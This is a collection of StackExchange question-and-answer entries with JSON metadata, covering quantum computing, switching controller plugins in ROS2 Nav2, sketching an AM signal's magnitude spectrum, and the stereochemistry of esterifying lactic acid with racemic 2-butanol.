In many cases, the difficulties are related to decoherence times and the speed at which the computers can perform calculations, which would allow the QECC time to operate. At this point those are now considered largely engineering challanges.
As far as physical breakthroughs, it is likely that those conversations are in regards to Topological Quantum Computers, which rely upon the construction of Anyons in order to operate. Currently these are largely viewed as pure mathematical constructions, however, the construction and use of stable anyons, even as quasiparticles, as part of topological quantum computer would be a major physical breakthrough. | {
"domain": "physics.stackexchange",
"id": 4735,
"tags": "quantum-mechanics, quantum-computer"
} |
nav2: changing controller plugins manually during runtime | Question:
I have created a controller plugin by following the tutorial and it is working as expected. I now have two controller plugins (The DWB controller present by default and the controller plugin I created) which are loaded at runtime and I can use those plugins in my behaviour tree as per my requirements.
My question is:
Is there a way in which I can I change the controller plugin during runtime manually if the need arises? If yes then How?
I am using Ubuntu 20.04 with ROS2 Foxy
Thanks for the help in advance
Originally posted by Divyanshu on ROS Answers with karma: 15 on 2020-11-25
Post score: 0
Answer:
In Nav2, you can have N different plugins in the controller server, rather than just 1. So you can load both of your plugins to use in the controller server and have them individually callable by their "name" namespace using the BT nodes for follow path. There's a controller_id field that defaults to the default ID we assign in the controller server, but that can be set to a different value in the section of the behavior tree that requires another controller.
Originally posted by stevemacenski with karma: 8272 on 2020-11-25
This answer was ACCEPTED on the original site
Post score: 1
Original comments
Comment by prince on 2020-12-17:
Is there any tutorial or sample package from which one can learn? Specifically for beginners of Nav2. | {
"domain": "robotics.stackexchange",
"id": 35798,
"tags": "microcontroller, plugin"
} |
How to sketch a frequency spectrum for an AM signal? | Question: So I have an AM signal, given by:
$$v(t)=50\cos(\pi 10^{6} t )+ 20\sin(\pi 10^3t)\cos(\pi 10^6 t)$$
I was asked to sketch the spectrum of the signal obtained, so I found the fourier transform of it, and that's what I got,
$$V(f)=25 \left[ \delta(f - 500k)+ \delta(f+500k)\right]-5i\left[\delta(f-999.5k)-\delta(f+999.5k) \right]-5i\left[\delta(f-500.5k)-\delta(f+500.5k) \right]$$
And so far I only knew how to sketch the first term, as shown below,
But I don't know how to sketch the terms with the $-5i$.
Answer: Since a signal's spectrum is complex, it can't be drawn in a single two-dimensional plot. What is usually done is to do two plots; one is the magnitude spectrum and the other is the phase spectrum.
When looking at signals, most of the time, the magnitude spectrum contains all the information that is needed and the phase spectrum is ignored. When looking at filters, the phase spectrum is important because one usually wants the phase response to be linear in the filter's passband.
So, what you need is the magnitude of $V(f)$:
$$|V(f)| = 25 \left[ \delta(f - 500k)+ \delta(f+500k)\right] + 5\left[\delta(f-999.5k) + \delta(f+999.5k) \right] + 5\left[\delta(f-500.5k)+\delta(f+500.5k) \right].$$
The magnitude spectrum is real, so it can be drawn in a regular 2-D plot. Note that all values of the magnitude spectrum are positive. | {
"domain": "dsp.stackexchange",
"id": 7050,
"tags": "digital-communications"
} |
How do I determine stereochemistry of the product | Question: When pure (L) lactic acid is esterified by racemic-2 butanol then what is the nature of the stereoisomers so obtained i.e. whether they are diastereomers or enantiomers.
I studied the mechanism of esterification but I didn't find anything regarding the stereo isomerism that can affect the formation of the product.Any ideas.Thanks.
Answer: The reaction doesn't change the stereo configuration for either reactant, so we can assume that the product is enantiomerically pure with respect to the carbon attached to the hydroxyl group (in orange below), and a racemic mixture with respect to the tertiary carbon (in blue).
Since there are multiple stereocenters, you can either have both the same (same molecule), both different (enantiomers), or have some different and some the same (diastereomer). The products would be diastereomers. In particular they would be epimers, which differ in only one stereocenter. | {
"domain": "chemistry.stackexchange",
"id": 7003,
"tags": "reaction-mechanism, stereochemistry"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.